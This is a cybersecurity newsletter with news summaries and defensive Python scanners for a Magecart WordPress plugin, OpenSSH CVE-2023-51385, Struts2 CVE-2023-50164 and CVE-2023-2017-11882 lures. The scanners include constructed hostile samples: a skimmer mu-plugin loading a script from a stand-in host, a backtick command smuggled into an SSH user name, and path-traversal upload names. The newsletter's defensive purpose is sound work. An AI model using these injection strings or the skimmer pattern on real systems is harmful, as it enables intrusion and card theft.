Daily Drop (672): Houthi Attacks, Magecart campaign, OpenSSH: CVE-2023-51385, CN: PBC Crypto, Struts2: CVE-2023-50164, FISA Section 702, Roscosmos: Arrest, Peach Sandstorm, Agent Tesla: CVE-2017-11882
12-23-23
Saturday, Dec 23 2023 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding Proof of Concept (PoC) links, where available, for the CVEs mentioned:
In this context a PoC is code or a procedure that demonstrates a reported vulnerability can actually be triggered on an unpatched system (a crash, a command executed, a file written where it should not be). It shows that the flaw is real and reachable, which is what defenders need in order to prioritise patching and to build detections, and it is usually a long way short of a weaponised exploit. Treat third-party PoCs as untrusted code: read them before running them, and run them only against systems you own or are authorised to test. *
U.S. Declassifies Intel on Iran's Alleged Role in Houthi Red Sea Attacks
Bottom Line Up Front (BLUF): The U.S. has declassified intelligence indicating Iran's significant involvement in Houthi attacks against commercial vessels in the Red Sea, highlighting the increasing risk to a vital global trade route. The U.S. signals possible responses as it consults with allies, reflecting escalating tensions and the strategic importance of maritime security.
Analyst Comments: The recent U.S. declassification of intelligence on Iran's involvement in Houthi maritime attacks underscores the intricate geopolitical dynamics of the Red Sea region. This area is crucial for global trade, and disruptions here can have wide-reaching economic repercussions. The U.S. is signaling a robust stance, reflecting its commitment to ensuring the security of critical international waterways. This situation also illustrates the broader regional power struggle and the U.S.'s attempt to counter perceived Iranian influence. The strategic nature of the Red Sea, coupled with the increasing use of asymmetric warfare tactics like drone and missile attacks by non-state actors, is altering the traditional maritime security paradigm.
FROM THE MEDIA: Reports from the Financial Times highlight U.S. claims of Iran's deep involvement in planning Houthi attacks on commercial vessels in the Red Sea, leveraging Iranian-provided monitoring systems and tactical intelligence. The escalation began in November, with targeted attacks causing significant disruption and leading to extensive rerouting of maritime traffic. The U.S. response includes deploying carrier strike groups and considering strikes against Houthi targets, reflecting the seriousness of the threat. The Houthis, supported by Iran, have employed tactics such as seizing civilian vessels and using Iranian drones and missiles in their operations. The report emphasizes the criticality of the Red Sea as a global trade artery and the potential for a broader regional conflict impacting international commerce and stability.
Rogue WordPress Plugin: A New Threat to E-Commerce Security
Bottom Line Up Front (BLUF): Security researchers have uncovered a rogue WordPress plugin involved in a Magecart campaign, designed to steal credit card information from e-commerce sites. The plugin creates fake admin users, hides its presence, and injects malicious JavaScript to exfiltrate data, signifying an advanced level of threat to website security.
Analyst Comments: This discovery fits a trend of increasingly capable attacks on e-commerce platforms, and it shows that a popular CMS is only as trustworthy as the code it has been told to load. The initial access is the usual one for WordPress: a compromised administrator account or a vulnerability in an existing plugin. Once the attacker can write into the plugin directories, the platform's own extension mechanism does the rest. The persistence tricks described here, hiding from the plugin list and seeding a backdoor administrator account, mean a site can look clean from the dashboard while skimming every checkout. Checks worth running on any WordPress storefront: list administrator accounts and compare them against the known roster, inspect wp-content/mu-plugins for files nobody placed there, and diff the rendered checkout page (fetched as an ordinary shopper, not as a logged-in admin) against a known-good copy, since that is the only page the skimmer needs to touch.
FROM THE MEDIA: The rogue WordPress plugin found by threat hunters is part of a larger Magecart campaign against e-commerce websites. It creates bogus administrator users and injects malicious JavaScript that copies card data from checkout pages as shoppers enter it. Once installed, it copies itself into the must-use plugins directory (wp-content/mu-plugins), which WordPress loads automatically and never lists as something an administrator can deactivate, and it filters itself out of the installed-plugins view so that it stays concealed from the admin panel. Those persistence mechanisms, combined with stealing data directly from checkout pages rather than from the database, make it a significant concern. Together with the recent discovery of similar campaigns that use other technologies for skimming, it underlines the ongoing risk and the need for comprehensive security strategies in the e-commerce domain.
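The checks above can be scripted. The following is an added example written for this page, not tooling from the researchers who reported the campaign: it walks wp-content/mu-plugins and scores each PHP file on the behaviours the report describes (hiding from the plugin list, creating an administrator, printing a script into the front end, copying itself into mu-plugins). The regexes, the triage thresholds and the two sample plugin sources are this example's own assumptions, not signatures taken from the actual malware.

```python
"""Heuristic scanner for a rogue WordPress mu-plugin of the kind described above.

Added example, not the researchers' tooling. WordPress auto-loads every PHP
file in wp-content/mu-plugins without listing it as an activatable plugin,
which is why a skimmer that copies itself there survives dashboard cleanup.
All patterns and thresholds below are assumptions for this example.
"""
import os
import re

# Each indicator: (label, regex). Patterns are assumptions, not campaign signatures.
INDICATORS = [
    # Hooking the plugin list lets a plugin unset its own entry so it never
    # appears in wp-admin/plugins.php (the usual hiding technique; assumed here).
    ("hides from plugin list", re.compile(r"add_filter\(\s*['\"]all_plugins['\"]")),
    # Creating a user and granting the administrator role = backdoor account.
    ("creates user", re.compile(r"\b(wp_create_user|wp_insert_user)\s*\(")),
    ("grants admin role", re.compile(r"(set_role|add_role)\(\s*['\"]administrator['\"]")),
    # Printing a <script> from a front-end hook is how a skimmer lands on checkout pages.
    ("injects script on front end", re.compile(r"add_action\(\s*['\"](wp_head|wp_footer)['\"]")),
    ("script targets checkout/card fields", re.compile(r"(is_checkout|card[_-]?number|cc[_-]?num|cvv|checkout)", re.I)),
    # Self-replication into mu-plugins so deleting it from /plugins does not help.
    ("copies itself into mu-plugins", re.compile(r"(copy|file_put_contents)\s*\(.*mu-plugins")),
]

def score_plugin_source(src: str):
    """Return the list of indicator labels matched by one PHP source text."""
    return [label for label, rx in INDICATORS if rx.search(src)]

def classify(hits):
    """Assumed triage rule: hiding plus (backdoor user or script injection) is HIGH."""
    hides = "hides from plugin list" in hits
    backdoor = "creates user" in hits or "grants admin role" in hits
    inject = "injects script on front end" in hits
    if hides and (backdoor or inject):
        return "HIGH"
    if hides or backdoor or inject:
        return "MEDIUM"
    return "LOW"

def scan_mu_plugins(wp_root: str):
    """Walk wp-content/mu-plugins and return {relative_path: (level, hits)}."""
    base = os.path.join(wp_root, "wp-content", "mu-plugins")
    results = {}
    for dirpath, _, files in os.walk(base):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = score_plugin_source(fh.read())
            results[os.path.relpath(path, base)] = (classify(hits), hits)
    return results

# Constructed sample: the shape of a rogue mu-plugin (inert toy, not real malware).
SAMPLE_ROGUE = r"""<?php
/* Plugin Name: WP Cache Addons */
add_filter('all_plugins', function($p){ unset($p['wp-cache-addons/wp-cache-addons.php']); return $p; });
$u = wp_create_user('wp_support', 'p@ss', 'support@example.invalid');
(new WP_User($u))->set_role('administrator');
add_action('wp_footer', function(){ if (is_checkout()) echo '<script src="https://cdn.example.invalid/s.js"></script>'; });
copy(__FILE__, WP_CONTENT_DIR . '/mu-plugins/' . basename(__FILE__));
"""

# Constructed sample: a harmless mu-plugin that only adjusts a setting.
SAMPLE_BENIGN = r"""<?php
/* Plugin Name: Site Tweaks */
add_filter('upload_mimes', function($m){ $m['svg'] = 'image/svg+xml'; return $m; });
"""

if __name__ == "__main__":
    for name, src in (("rogue", SAMPLE_ROGUE), ("benign", SAMPLE_BENIGN)):
        hits = score_plugin_source(src)
        print(name, classify(hits), hits)
    # Real use: print(scan_mu_plugins("/var/www/html"))
```

Run scan_mu_plugins() against the site root; anything rated HIGH deserves a look at the file and at the wp_users table for accounts it may have created. Expect false positives from legitimate mu-plugins that print front-end scripts, which is why the rule weights hiding from the plugin list most heavily: no honest plugin needs that.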
READ THE STORY: THN
OpenSSH Command Injection via ProxyCommand and ProxyJump Hostnames: CVE-2023-51385
Bottom Line Up Front (BLUF): CVE-2023-51385 is an OS command injection bug in the OpenSSH client. When a host or user name containing shell metacharacters is expanded into a ProxyCommand (which ProxyJump uses internally) through tokens such as %h or %r, the characters reach the user's shell unescaped and arbitrary commands run on the client machine. All OpenSSH releases before 9.6 (9.6p1 on portable builds) are affected. The source reports a CVSS score of 9.8; NVD's own rating is lower (6.5, Medium) because the victim has to be induced to connect to an attacker-chosen name, for example through a submodule URL in a cloned Git repository.
Analyst Comments: The bug is a reminder that token expansion into a command string is string concatenation, and that any concatenated string handed to /bin/sh is an injection sink unless its inputs are constrained. The practical attack surface is every tool that calls ssh with a hostname taken from untrusted data: Git submodules are the documented case, but deployment and inventory scripts that build ssh targets from files they did not author are in the same position. The fix OpenSSH shipped is an allow-list on the client side, refusing names with most shell metacharacters before expansion happens; that is the right shape for this class of bug and worth copying in any wrapper that builds ssh command lines. Two quick checks: run ssh -V to confirm the client is 9.6 or later, and grep ~/.ssh/config and /etc/ssh/ssh_config for ProxyCommand, LocalCommand or Match exec lines that reference %h or %r, since those are the configurations in which a hostile name actually gets executed.
FROM THE MEDIA: CVE-2023-51385 lets an attacker execute arbitrary commands on a machine whose OpenSSH client connects, via ProxyCommand or ProxyJump, to a host or user name the attacker controls. The flaw is insufficient validation of those names: OpenSSH substituted them textually into the proxy command and passed the result to the shell, so backticks, $(...) and similar sequences in the name were interpreted rather than treated as part of the hostname. Because the client ships with essentially every Unix-like operating system and is invoked by tools such as Git, the exposure is broad. Users and organisations are urged to update to OpenSSH 9.6 (9.6p1 on portable builds), which refuses such names, and to patch any wrapper tooling that constructs ssh targets from untrusted input.
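To make the mechanism concrete, here is an added example (written for this page, not OpenSSH's code) that reproduces the textual %h/%p/%r substitution ssh performs on a ProxyCommand string, shows how a hostile hostname survives into the command, and pairs it with the kind of allow-list check that stops it. The allow-list (letters, digits, '.', '-', '_') is this example's choice and is stricter than what OpenSSH 9.6 enforces; the .gitmodules parser is a minimal regex, not Git's; the sample .gitmodules content is constructed.

```python
"""ProxyCommand token expansion and a hostname allow-list (CVE-2023-51385 class).

Added example, not OpenSSH code. ssh expands %h (host), %p (port) and
%r (remote user) textually into the ProxyCommand string and hands the
result to the user's shell, so metacharacters inside the hostname become
part of the command. The SAFE_NAME allow-list below is this example's
own, stricter choice; OpenSSH 9.6 bans most shell metacharacters.
"""
import re

SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")
# Characters that mean something to /bin/sh once the command string is built.
SHELL_META = set("`$|;&<>(){}*?!\\'\"\n\t ")

def expand_proxy_command(template: str, host: str, port: int, user: str) -> str:
    """Mimic ssh's textual substitution of %h/%p/%r (and %% -> %)."""
    out, i = [], 0
    while i < len(template):
        c = template[i]
        if c == "%" and i + 1 < len(template):
            tok = template[i + 1]
            out.append({"h": host, "p": str(port), "r": user, "%": "%"}.get(tok, "%" + tok))
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)

def hostname_is_safe(name: str) -> bool:
    """Reject any host or user name that could alter the shell command."""
    return bool(SAFE_NAME.match(name)) and not (set(name) & SHELL_META)

def build_proxy_command(template: str, host: str, port: int, user: str) -> str:
    """Safe wrapper: validate before expanding, as a patched client does."""
    if not (hostname_is_safe(host) and hostname_is_safe(user)):
        raise ValueError(f"refusing name with shell metacharacters: {host!r} {user!r}")
    return expand_proxy_command(template, host, port, user)

# Pre-clone check for the documented vector: submodule URLs in .gitmodules.
GITMODULE_URL = re.compile(r"^\s*url\s*=\s*(.+?)\s*$", re.M)
SSH_URL = re.compile(r"^(?:ssh://)?(?:(?P<user>[^@/]+)@)?(?P<host>[^:/]+)")

def risky_submodule_hosts(gitmodules_text: str):
    """Return (url, user, host) for submodule URLs whose SSH user or host fails the check."""
    risky = []
    for m in GITMODULE_URL.finditer(gitmodules_text):
        url = m.group(1)
        parts = SSH_URL.match(url)
        if not parts:
            continue
        user = parts.group("user") or "git"   # assumed default when no user@ is given
        host = parts.group("host")
        if not (hostname_is_safe(host) and hostname_is_safe(user)):
            risky.append((url, user, host))
    return risky

# Constructed sample: one ordinary submodule and one with a hostile user name.
SAMPLE_GITMODULES = """[submodule "lib"]
\tpath = lib
\turl = git@github.com:example/lib.git
[submodule "evil"]
\tpath = evil
\turl = ssh://`id`@example.invalid/x.git
"""

if __name__ == "__main__":
    tmpl = "nc -X connect -x proxy.example.invalid:1080 %h %p"
    print(expand_proxy_command(tmpl, "bastion.example.invalid", 22, "ops"))
    # Unvalidated: the backticks survive straight into the command line.
    print(expand_proxy_command(tmpl, "`id`", 22, "ops"))
    print(risky_submodule_hosts(SAMPLE_GITMODULES))
```

The second print shows the whole problem in one line: the expanded string is a shell command with `id` embedded, and nothing downstream can tell the hostname apart from the rest. Validation therefore has to happen before expansion, on the raw name, which is what build_proxy_command() and the .gitmodules check both do.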
READ THE STORY: Cyber Kendra // PoC
China Calls for Enhanced Global Crypto Oversight Amid Financial Stability Concerns
Bottom Line Up Front (BLUF): The People's Bank of China (PBC) has stressed the importance of global cooperation and consistent regulatory oversight over the burgeoning crypto market in its latest Financial Stability Report. The report comes amid rising concerns about the speculative nature and potential financial system vulnerabilities posed by cryptocurrencies, advocating for a unified supervisory approach to mitigate risks.
Analyst Comments: The PBC's call for enhanced global crypto oversight is a significant indicator of China's proactive stance on financial technology and its potential risks. By highlighting issues like insider control, asset concealment, and security vulnerabilities specific to crypto assets, the report reflects a growing global consensus on the need for a structured regulatory framework. The push for international cooperation against the backdrop of recent market upheavals, such as the FTX collapse, underscores the urgency for a cohesive approach.
FROM THE MEDIA: The PBC's Financial Stability Report 2023 underscores the exponential growth and inherent risks of the global crypto market, urging for a "same business, same risks, same supervision" approach. It elaborates on a six-pronged strategy to secure the DeFi ecosystem, emphasizing governance, operational control, and enhanced supervision. The report acknowledges crypto assets' limited yet significant impact on the global financial system, advocating for regulatory restructuring and market reforms to manage inherent risks effectively. The focus is on preemptive measures against vulnerabilities, particularly in light of increasing cyber threats, and the need for international regulatory harmony to address the cross-border nature of crypto assets.
READ THE STORY: Coin Pedia
Critical Vulnerability in Apache Struts2: CVE-2023-50164
Bottom Line Up Front (BLUF): Apache Struts2, a widely used framework for Java web applications, has a critical vulnerability, CVE-2023-50164 (Apache advisory S2-066), that can lead to remote code execution. It carries a CVSS score of 9.8 and affects Struts 2.0.0 through 2.3.37 (end of life), 2.5.0 through 2.5.32 and 6.0.0 through 6.3.0.1; the fixed releases are 2.5.33 and 6.3.0.2, and affected deployments should be upgraded without delay.
Analyst Comments: CVE-2023-50164 is not a legacy-only problem: the current 6.x line is affected alongside the end-of-life 2.3 series, which is a reminder of how much exposed enterprise code still rides on a handful of frameworks. Remote code execution bugs of this kind let an attacker take full control of the affected server, with data theft, lateral movement or ransomware as the usual follow-on. The extra difficulty with Struts is inventory: it is often bundled inside vendor applications rather than deployed directly, so the search has to cover third-party WAR files and appliances, not just in-house builds. Organisations that cannot upgrade immediately should at least confirm which applications expose a file-upload action through Struts, since those are the reachable ones, and watch upload endpoints for path traversal attempts.
FROM THE MEDIA: CVE-2023-50164 is a critical remote code execution flaw in Apache Struts2 caused by improper handling of file upload parameters. By manipulating those parameters an attacker can perform path traversal and write an uploaded file outside the intended upload directory; when that location is served by the application, for example as a JSP, the file runs with the web application's privileges and the server is compromised. The bug affects multiple versions of Struts2, and Apache has provided patched versions as the remedy. Organisations are urged to upgrade immediately and to scan their environments, including vendor-supplied applications, to identify and patch vulnerable deployments.
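Two of the checks above are easy to script. The following is an added example for this page, not Apache's code or a reproduction of the exploit: a version comparison against the ranges in the Apache advisory, the defensive handling an upload path needs regardless of framework (drop every client-supplied directory component and confirm the resolved target stays inside the upload directory), and a scan for traversal in file-name parameters over a few constructed log lines. The log-line format and the parameter names are assumptions for this example.

```python
"""Version check, hardened upload-path handling and log triage for CVE-2023-50164.

Added example, not Apache's code. Affected ranges are those in Apache's
S2-066 advisory: 2.0.0-2.5.32 and 6.0.0-6.3.0.1 (fixed in 2.5.33 and
6.3.0.2). Log format and parameter names below are constructed.
"""
import os
import posixpath
import re
from urllib.parse import unquote

AFFECTED = [((2, 0, 0), (2, 5, 33)), ((6, 0, 0), (6, 3, 0, 2))]  # [lower, fixed)

def parse_version(v: str):
    """'6.3.0.1' -> (6, 3, 0, 1); tolerant of suffixes like '-SNAPSHOT'."""
    return tuple(int(x) for x in re.findall(r"\d+", v))

def pad_version(t, n=4):
    return tuple(t) + (0,) * (n - len(t))

def struts_affected(version: str) -> bool:
    """True if the version falls inside an affected range from the advisory."""
    v = pad_version(parse_version(version))
    return any(pad_version(lo) <= v < pad_version(fixed) for lo, fixed in AFFECTED)

def safe_upload_path(upload_dir: str, client_filename: str) -> str:
    """Strip client-supplied directories and keep the result under upload_dir.

    The basename step alone defeats '../'; the commonpath check is kept as a
    second line of defence so a future change to the name handling cannot
    silently reopen the escape.
    """
    name = unquote(client_filename)
    name = name.replace("\\", "/")          # treat both separator styles the same
    name = posixpath.basename(name)         # drop every path component
    if not name or name in (".", "..") or "\0" in name:
        raise ValueError("invalid upload file name")
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("upload escapes upload directory")
    return target

# Detection: any *FileName parameter carrying traversal, plain or URL-encoded.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e%2f|%2e%2e/|\.\.%2f)", re.I)
PARAM = re.compile(r"([A-Za-z0-9_]*FileName)=([^&\s]*)", re.I)

def flag_upload_traversal(log_line: str):
    """Return [(param, decoded_value)] for file-name params that try to traverse."""
    hits = []
    for param, value in PARAM.findall(log_line):
        if TRAVERSAL.search(value) or TRAVERSAL.search(unquote(value)):
            hits.append((param, unquote(value)))
    return hits

# Constructed sample log lines (not from any real incident).
SAMPLE_LOG = [
    "POST /upload.action upload=1 uploadFileName=report.pdf 200",
    "POST /upload.action Upload=1 uploadFileName=../../webapps/ROOT/shell.jsp 200",
    "POST /upload.action Upload=1 uploadFileName=%2e%2e%2f%2e%2e%2fshell.jsp 200",
]

if __name__ == "__main__":
    for v in ("2.3.37", "2.5.32", "2.5.33", "6.3.0.1", "6.3.0.2", "6.4.0"):
        print(v, "affected" if struts_affected(v) else "fixed")
    for line in SAMPLE_LOG:
        print(flag_upload_traversal(line))
    print(safe_upload_path("/tmp/uploads", "../../etc/passwd"))
```

The version string to feed struts_affected() comes from the Manifest of struts2-core-*.jar inside each deployed WAR, which is also the fastest way to find bundled copies that an application inventory does not mention.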
READ THE STORY: Security Boulevard // PoC
Biden Enacts Short-term Extension of FISA Section 702 Amid Congressional Divide
Bottom Line Up Front (BLUF): President Biden signed a short-term extension for Section 702 of the Foreign Intelligence Surveillance Act (FISA), a key but contentious U.S. surveillance tool. This temporary measure extends digital spying capabilities until mid-April, amidst ongoing congressional debates and divides over long-term reauthorization and necessary reforms.
Analyst Comments: The extension of FISA Section 702 by President Biden reflects the ongoing complexity and contention surrounding surveillance laws in the U.S. The short-term nature of the extension underscores the difficulties in reconciling security needs with privacy concerns, particularly given the recent history of FBI violations and the incidental collection of Americans' communications. As Congress grapples with how to move forward, the tension between national security imperatives and civil liberties remains at the forefront, necessitating a delicate balance. The spotlight on proposed reforms and their potential impact on surveillance practices suggests a critical period ahead for U.S. intelligence and privacy laws.
FROM THE MEDIA: President Biden's recent signing of the short-term FISA extension is a stopgap measure amid a broader debate over surveillance practices and privacy protections. Section 702 allows for the collection of foreign intelligence, including internet and phone activities, but has been criticized for also sweeping up Americans' communications. The extension follows a failed attempt by the House to secure a longer-term renewal, reflecting deep divisions over the program's future. Civil liberties advocates and some lawmakers are pushing for significant reforms, particularly increased oversight and stricter controls on the querying of Americans' data. The coming months are expected to see continued discussion and potentially pivotal changes to how the U.S. approaches and regulates surveillance.
READ THE STORY: The Record
Russia Space Agency Official Detained Over Multi-Million-Euro Fraud
Bottom Line Up Front (BLUF): The Russian investigative committee has detained Oleg Frolov, the deputy director of Russia's space agency Roscosmos, along with two other suspects, on charges of embezzling 4.3 million euros from the space sector. The arrests come amidst a spate of financial troubles and corruption scandals plaguing the once-proud space agency.
Analyst Comments: The detention of a high-ranking official from Roscosmos marks a significant development in the ongoing scrutiny of corruption within Russia's space industry. The arrest of Frolov signals a broader crackdown on financial misconduct in sectors critical to national pride and technological progress. This incident highlights the increasing challenges Roscosmos faces, including financial instability and technical failures, as it continues to compete in the global space race. These developments may impact Russia's future space endeavors and its reputation in the international space
FROM THE MEDIA: Russian authorities arrested Oleg Frolov, deputy director of Roscosmos, and two others for alleged involvement in a "large-scale fraud" scheme, leading to the misappropriation of 4.3 million euros intended for the space sector. The arrests reflect ongoing issues within Roscosmos, which has been marred by corruption scandals and operational failures, including the recent loss of the Luna-25 probe. Despite these setbacks, Russia remains committed to its ambitious space agenda, including plans for an independent space station and revitalizing its moon program. The case underscores the gravity of corruption within essential national sectors and the need for rigorous oversight and accountability.
READ THE STORY: Reuters
Iran's 'Peach Sandstorm' Cyberattack Targets Global Defense Networks
Bottom Line Up Front (BLUF): Iranian nation-state cyberattack group, known as Peach Sandstorm, is actively targeting the global military-industrial sector with a custom backdoor named FalseFont. The sophisticated cyberattacks aim to infiltrate and compromise systems integral to the research and development of military technologies.
Analyst Comments: The emergence of the FalseFont backdoor as a tool for Peach Sandstorm (also known as APT33, Elfin, Holmium, or Refined Kitten) reflects a continuing trend of nation-state actors developing and refining cyber espionage capabilities. These attacks, primarily focusing on the satellite and defense sectors, indicate a strategic interest in gaining a competitive edge in military technologies and intelligence. The consistent evolution of Peach Sandstorm's methods and the targeted nature of their campaigns underscore the persistent threat posed by state-sponsored cyber actors and the critical need for robust security in defense-related industries.
FROM THE MEDIA: Iran's cyberattack group, Peach Sandstorm, is deploying the FalseFont backdoor to infiltrate organizations within the global military-industrial complex. According to Microsoft Threat Intelligence, the backdoor enables remote access, file execution, and data exfiltration. Targeting the defense and satellite sectors, Peach Sandstorm's activities in 2023 have been characterized by a keen interest in military technology and development systems. The development of FalseFont signifies the group's ongoing efforts to enhance their cyber capabilities and signifies a continued threat to global defense networks and infrastructure.
READ THE STORY: DR
US Targets Banks Funding Russia's Military Industrial Complex with Sanctions
Bottom Line Up Front (BLUF): The Biden administration is set to issue an executive order to impose sanctions on foreign financial institutions that are supporting Russia's military industrial complex. This move is part of the broader strategy to undermine Moscow's ability to sustain its military operations in Ukraine by targeting the financial mechanisms facilitating the acquisition of essential equipment and goods for the war.
Analyst Comments: The impending sanctions signify a tactical shift in the U.S.'s approach to economic warfare, targeting the financial lifelines that enable the continuation of the conflict in Ukraine. By focusing on banks, the U.S. aims to disrupt the supply chain of critical components needed for Russia's military endeavors. This move underscores the broader geopolitical struggle, reflecting a strategic effort to pressure not only Moscow but also the international financial institutions that indirectly support its military actions. The effectiveness of these sanctions will depend on the cooperation and compliance of global banking institutions, as well as the adaptability of Russian procurement strategies.
FROM THE MEDIA: According to the Financial Times, the upcoming executive order by the Biden administration will enable the U.S. to place sanctions on banks aiding Russia in procuring equipment and goods vital for its military operations in Ukraine. The U.S. Treasury has emphasized that severe consequences await those financing and facilitating such transactions. The move is aimed at making the financial system a choke point for Russia's access to sensitive items like semiconductors, machine tools, and other critical materials. While many Western banks have already ceased their operations in Russia, the continued presence of some, along with the increasing involvement of Chinese lenders, presents a complex challenge to the enforcement and effectiveness of these sanctions. The U.S. intends to work closely with U.S. and European banks to ensure compliance and prevent the circumvention of these new measures.
The Growing Liability of Artificial Intelligence in Business and Society
Bottom Line Up Front (BLUF): The Register piece examines the growing liability concerns around artificial intelligence, citing examples from the automotive and healthcare industries. It covers the challenges of regulating AI, the lawsuits now in progress, and the ethical implications of automating decisions with AI systems.
Analyst Comments: Artificial intelligence has transitioned from a promising technology to a complex liability with incidents and lawsuits beginning to surface. The balance between innovation and control is precarious as evidenced by cases like Tesla's autopilot-related accidents and the misuse of AI in healthcare for denying care. The industry's response, focusing on "guardrails," is indicative of the inherent risks in deploying AI systems. The narrative of AI as a liability, juxtaposed with historical warnings like Frankenstein and Pandora's Box, underlines the need for cautious optimism and robust regulatory frameworks. The piece also hints at the tech industry's cyclic fascination with emerging technologies, positioning AI as the latest in a series of disruptive but potentially overhyped advancements.
FROM THE MEDIA: The article highlights several instances where AI has proven to be more of a liability than an asset. It cites the case of a Tesla driver's fatal accident while using Autopilot and the lawsuits against United Healthcare over an AI model used to deny care to seniors. It discusses the inadequacy of current legal frameworks for AI-related incidents and the regulatory measures in the pipeline, including the European Commission's efforts and the proposed Bipartisan AI Framework in the US. Its critique of the hype around AI suggests that the rush to adopt the technology may be overlooking significant ethical and practical concerns, and it points to the industry's vested interest in promoting AI, given the major tech companies' stakes in the cloud and hardware that AI processing runs on. The conclusion calls for more human-centric deployment of AI, balancing technological advancement against ethical responsibility.
READ THE STORY: The Register
Hackers Exploit Six-Year-Old Microsoft Office Bug for Agent Tesla Malware
Bottom Line Up Front (BLUF): Cybersecurity experts have observed a resurgence in the use of a six-year-old Microsoft Office vulnerability, CVE-2017-11882, by hackers to deploy Agent Tesla, a sophisticated malware. Despite the age of the vulnerability, its continued exploitation underscores the challenge of patch management and the risks of using end-of-life software.
Analyst Comments: The continued exploitation of CVE-2017-11882, a well-documented and relatively old vulnerability, serves as a stark reminder of the perennial issues within cybersecurity: inadequate patch management and the use of outdated, unsupported software. Agent Tesla's deployment through this exploit highlights the sophistication and persistence of threat actors who capitalize on these systemic weaknesses. This situation underscores the need for organizations to prioritize regular software updates, retire end-of-life systems, and maintain vigilance against seemingly outdated but still potent threats. As long as there remains a divide between the security "haves" and "have nots," the cycle of exploitation is likely to continue, emphasizing the need for more accessible and sustainable cybersecurity practices across all sectors.
FROM THE MEDIA: Threat actors are increasingly leveraging CVE-2017-11882, a six-year-old remote code execution flaw in the legacy Equation Editor component (EQNEDT32.EXE) that shipped with Microsoft Office, to distribute Agent Tesla. The bug is memory corruption, a stack buffer overflow when the component parses the font name inside an embedded equation, so opening a document that carries a crafted Equation Editor object is enough to trigger it. The campaigns spread the malware, a keylogger and credential stealer, through deceptive phishing emails with malicious Excel attachments. Microsoft patched the component in November 2017 and removed it from Office outright in January 2018, so a machine that still has EQNEDT32.EXE under Common Files\Microsoft Shared\EQUATION is missing years of updates; the exploit's continued effectiveness comes down to exactly such outdated installs and slow patch rollout. Experts highlight the need for robust phishing protection and for controls that can detect and neutralise threats like Agent Tesla. A practical addition is to flag inbound Office attachments that embed an Equation Editor object at the mail gateway, since no legitimate document has needed that component since 2018.
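The gateway check just mentioned can be implemented without parsing the full document. The following is an added example for this page, not part of the Agent Tesla reporting: it looks for the Equation Editor 3.0 class identifier (CLSID 0002CE02-0000-0000-C000-000000000046) and the "Equation Native" stream name, both of which an embedded Equation Editor object carries. OOXML files (.docx/.xlsx) store embedded objects as .bin members under word/embeddings or xl/embeddings and are opened as zips; legacy .doc/.xls files are OLE compound files and are scanned here as raw bytes rather than parsed structurally. Presence of the object is a triage signal, not proof of exploitation. The sample files are constructed in memory.

```python
"""Find embedded Equation Editor objects in Office files (CVE-2017-11882 lure triage).

Added example, not from the Zscaler/Agent Tesla reporting. Exploit documents
for this bug embed an OLE object of class Equation Editor 3.0; its data
stream is named "Equation Native". Raw byte search is a deliberate
simplification: it does not parse the OLE directory, so it cannot tell an
object apart from the same bytes appearing elsewhere in the file.
"""
import io
import uuid
import zipfile

EQUATION_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")
# OLE stores GUIDs little-endian (bytes_le); stream names are UTF-16LE.
EQUATION_CLSID_BYTES = EQUATION_CLSID.bytes_le
EQUATION_STREAM = "Equation Native".encode("utf-16-le")
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

def scan_bytes(data: bytes):
    """Return indicator names found in one blob (OLE file or embedded object)."""
    found = []
    if EQUATION_CLSID_BYTES in data:
        found.append("equation-editor-clsid")
    if EQUATION_STREAM in data:
        found.append("equation-native-stream")
    return found

def scan_office_file(data: bytes):
    """Dispatch on container type; returns {member_or_'<ole>': [indicators]}."""
    results = {}
    if data.startswith(OLE_MAGIC):          # legacy .doc/.xls/.ppt: one OLE file
        hits = scan_bytes(data)
        if hits:
            results["<ole>"] = hits
        return results
    if data.startswith(b"PK"):              # OOXML: zip with embedded objects as .bin
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if "/embeddings/" in name and name.lower().endswith(".bin"):
                    hits = scan_bytes(zf.read(name))
                    if hits:
                        results[name] = hits
    return results

def verdict(results) -> str:
    return "SUSPECT: embedded Equation Editor object" if results else "no Equation Editor object"

# Constructed samples: a toy OLE-like blob and a toy .docx-like zip (not real documents).
def make_sample_ole(with_equation: bool) -> bytes:
    body = bytearray(OLE_MAGIC + b"\x00" * 64)
    if with_equation:
        body += EQUATION_STREAM + b"\x00" * 8 + EQUATION_CLSID_BYTES
    return bytes(body)

def make_sample_docx(with_equation: bool) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/embeddings/oleObject1.bin", make_sample_ole(with_equation))
    return buf.getvalue()

if __name__ == "__main__":
    samples = (("doc", make_sample_ole(True)), ("docx", make_sample_docx(True)), ("clean", make_sample_docx(False)))
    for label, blob in samples:
        print(label, verdict(scan_office_file(blob)))
    # Real use: scan_office_file(open("attachment.xlsx", "rb").read())
```

For production use, replace the raw byte search on OLE files with a proper compound-file parser so the match is tied to an actual embedded object; the OOXML path is already precise because it only looks inside embedded-object members.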
Items of interest
China Requests U.S. Sanction Exemptions for Russian LNG Project
Bottom Line Up Front (BLUF): China's oil majors CNPC and CNOOC have officially requested the U.S. government for exemptions from sanctions targeting the Arctic LNG 2 project in Russia. These moves underscore the intricate geopolitics of energy security and the challenging balancing act for multinational corporations amid escalating tensions.
Analyst Comments: The request from CNPC and CNOOC for U.S. sanction exemptions reflects the complex interplay of global energy politics and the strategic importance of the Arctic LNG 2 project, not just for Russia but for its international stakeholders. This action signals China's intent to protect its economic interests while navigating the delicate geopolitical dynamics resulting from the Ukraine conflict. The situation highlights the broader implications of U.S. sanctions, affecting international collaboration in significant energy projects, and raises questions about the effectiveness and reach of unilateral sanctions in a deeply interconnected global economy.
